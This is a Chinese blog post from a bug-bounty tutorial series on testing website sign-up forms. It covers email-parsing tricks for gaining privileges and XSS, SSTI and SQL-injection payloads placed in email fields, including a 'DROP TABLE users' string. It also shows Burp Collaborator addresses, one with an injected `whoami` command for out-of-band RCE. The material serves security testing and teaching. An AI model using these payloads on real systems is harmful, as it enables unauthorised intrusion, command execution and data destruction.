赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

最新推荐文章于 2024-05-03 16:12:22 发布
最新推荐文章于 2024-05-03 16:12:22 发布
阅读量67 收藏
点赞数
文章标签: java 前端 服务器 数据库 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/richard1230/article/details/133072541
版权

赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

正文

本文承接前文,继续梳理注册功能的测试流程

第八种情况

注册的时候尝试利用带有空格的公司邮箱地址来注册,比方说: "admin@company.com "(注意:com后面有一个空格)

可能会发现一些意向不到的情况(可能会发现有额外的权限)

POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number
firstname=I&lastname=am&email=admin@company.com &password=*****&captcha=Random&token=CSRF

第九种情况

注册公司邮件的时候尝试用大写的邮件,例如admin@COMPANY.COM,可能获取额外的权限或获得更多的功能

POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number

firstname=I&lastname=am&email=admin@COMPANY.COM &password=*****&captcha=Random&token=CSRF

第十种情况

邮件写成以下形式,你可能会有意想不到的发现:

admin@gmail.com@company.com 
me+(@gmail.com)@company.com 
"me@gmail.com"@company.com
"<me@gmail.com>"@company.com 
"me@gmail.com;"@company.com 
"me@gmail.com+"@company.com

第十一种情况

和上面tips类似,将gmail用googlemail.com 来替代

admin@googlemail.com@company.com 
me+(@googlemail.com)@company.com 
"me@googlemail.com"@company.com
"<me@googlemail.com.com>"@company.com
 "me@googlemail.com;"@company.com
"me@googlemail.com+"@company.com

第十二种情况

尝试使用以下payload,看是否能造成xss,ssti或者sqli

me+(<script>alert(0)</script>)@gmail.com 
me(<script>alert(0)</script>)@gmail.com 
me@gmail(<script>alert(0)</script>).com 
"<script>alert(0)</script>"@gmail.com 
"<%= 7 * 7 %>"@gmail.com 
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com 
%@gmail.com

第十三种情况

尝试用以下payload获取后台信息或者内部IPs

me@id.collaborator.net 
me@[id.collaborator.net] 
user(;me@id.collaborator.net)@gmail.com 
me@id.collaborator.net(@gmail.com)
 me+(@gmail.com)@id.collaborator.net 
 <me@id.collaborator.net>user@gmail.com

第十四种情况

有时候系统在发送之前会ping你的主机,可以尝试利用带有注入系统命令的Burp Collaborator的邮件地址来实现rce

如下所示

POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number

firstname=I&lastname=am&email=me@`whoami`.id.collaborat or.net&password=********&captcha=Random&token=CSRF

参考

http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate

https://www.youtube.com/watch?v=cThFNXrBYQU

https://www.youtube.com/watch?v=cbJ4NSYsUto

https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17

https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses

richard1230
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
游戏脚本-赏金猎人-厄运小姐.zip
07-28
游戏小脚本
赏金猎人系列-如何测试注册(Sign up)功能III以及相关Tips
richard1230的博客
10-31 66
赏金猎人系列-如何测试注册(Sign up)功能III以及相关Tips 声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 本文选自本人公众号: growing0101 正文 本文为本系列的第三篇,继续梳理注册功能中可能存在漏洞的测试流程与方法 第十五种方法 尝试用公司邮箱地址来注册,例如...
赏金猎人系列-如何测试注册(Sign up)功能
richard1230的博客
10-31 52
赏金猎人系列-如何测试注册(Sign up)功能 声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 本文选自本人公众号: growing0101 前言 在正常的打猎(漏洞挖掘)过程中,Sign Up是常见的一个功能,之前写过一篇 注册功能测试小结,但是不是很全, 本文将着重对此功能测试...
赏金猎人系列-如何测试sso相关的漏洞
richard1230的博客
10-25 1114
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
赏金猎人系列-如何测试sso相关的漏洞(II)
richard1230的博客
10-31 48
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 本文选自本人公众号: growing0101 前言 本文承接前文,继续梳理sso漏洞相关测试方法. 正文 第八种情况 如果发现有uuid的这种形式,可以尝试将其更改为攻击者的uuid,例如,你可以改为内部员工或者说是管理员的账户的电子邮...
12--赏金猎人商业计划书.pptx
03-01
12--赏金猎人商业计划书.pptx
游戏脚本-赏金猎人-厄运小姐2.zip
07-28
游戏小脚本
重生之我是赏金猎人(十二)-记一次与飞塔流量检测对抗的文件上传1
08-03
0x00 前如有技术交流或渗透测试/代码审计/红队向培训/红蓝对抗评估需求的朋友欢迎联系QQ/VX-5470066600x01 起因某项靶标,是个员管理系统,通
赏金猎人
02-10
赏金猎人
Day25-Java基础之常用类1
m0_46053885的博客
04-27 1109
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
链表刷题集
yajunjiao的专栏
04-30 481
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
d15(136-148)-勇敢开始Java,咖啡拯救人生
m0_73459387的博客
04-28 1070
对象哈希值的特点:同一个对象调用hashCode()返回的哈希值相同;HashMap的键依赖hashCode方法和equals方法保证键的唯一,存储自定义类型的对象时,重写这两个方法。实际上,Set系列集合的底层就是基于Map实现的,只是Set集合中的元素要键数据,不要值数据。当12个位置都占满时就会扩容,大约扩容为原来的二倍,再把原数组数据转移到新数组。使用迭代器遍历集合时,又同时在删除集合中的数据,程序就会出现并发修改异常的错误。基于哈希表实现,每个键值对额外多了一个双链表的机制,记录元素顺序(保证。
Java解决最长公共前缀
无人罪的博客
04-28 378
编写一个函数来查找字符串数组中的最长公共前缀。如果不存在公共前缀,返回空字符串""。
【一步一步了解Java系列】:探索Java基本类型与C语言的区别
2302_81249757的博客
04-29 890
​​喜欢的一句话: 常常会回顾努力的自己,所以要为自己的努力留下足迹。作者:小闭。
Spring cloud原理详解
qq_33449977的博客
04-28 468
想象一下,你开了一家餐馆,一开始只卖汉堡,后来生意火了,你又增加了炸鸡、披萨、冰淇淋各种摊位,每个摊位就是一个微服务,它们各自独立工作,但又得相互配合。有时候,某个服务可能太忙了,电话老打不通,这时候Spring Cloud还有个叫Hystrix的断路器,它会说:“嘿,别打了,那边线路忙,我给你个备用方案或者告诉你稍后再试。至于餐馆运营情况,Spring Cloud Sleuth和Zipkin这些工具,就像监控摄像头,记录服务间的每一次交互,方便你查看哪里出了问题,优化服务流程。
Nacos 配置中心实例分析实践
最新发布
m0_73557631的博客
05-03 468
​ 浏览器: http://localhost:5000/nacos/config/ip。先创建e-commerce-nacos-config-client5000 模块。​ 启动e-commerce-nacos-config-client5000。​ 启动Nacos Server。
公考学习平台|基于SprinBoot+vue的公考学习平台(源码+数据库+文档)
weixin_66413741的博客
04-30 1038
本共享汽车管理系统有管理员和用户。管理员功能有个人中心,用户管理,投放地区管理,汽车信息管理,汽车投放管理,汽车入库管理,使用订单管理,汽车归还管理。用户可以在注册登录,可以对汽车进行使用产生订单,还可以归还。因而具有一定的实用性。本站是一个B/S模式系统,采用Spring Boot框架,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得共享汽车管理系统管理工作系统化、规范化。
Java 解决pdfbox转图片显示中文乱码 No glyph for 165 (CID 5752) in font STSong-Light
qq_38650613的博客
04-28 400
在开发PDF转JPG图片后,图片显示中文乱码,以下为具体示例:截图可以看到¥符号无法转换为乱码代码已经提示我们STSong-Light字体中165符文不存在,而165正好对应着¥字符。(如果你们出现不存在某个字体的报错,接下来也可以跟我一样操作)
bb电竞 赏金大使源码
10-25
bb电竞赏金大使源码是指bb电竞平台开放给玩家的一种源代码,可以帮助玩家创建自己的赏金任务,并通过完成任务获得奖励。这一功能的引入让玩家可以更加自由地参与到bb电竞的生态系统中,享受到更多的互动和乐趣。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值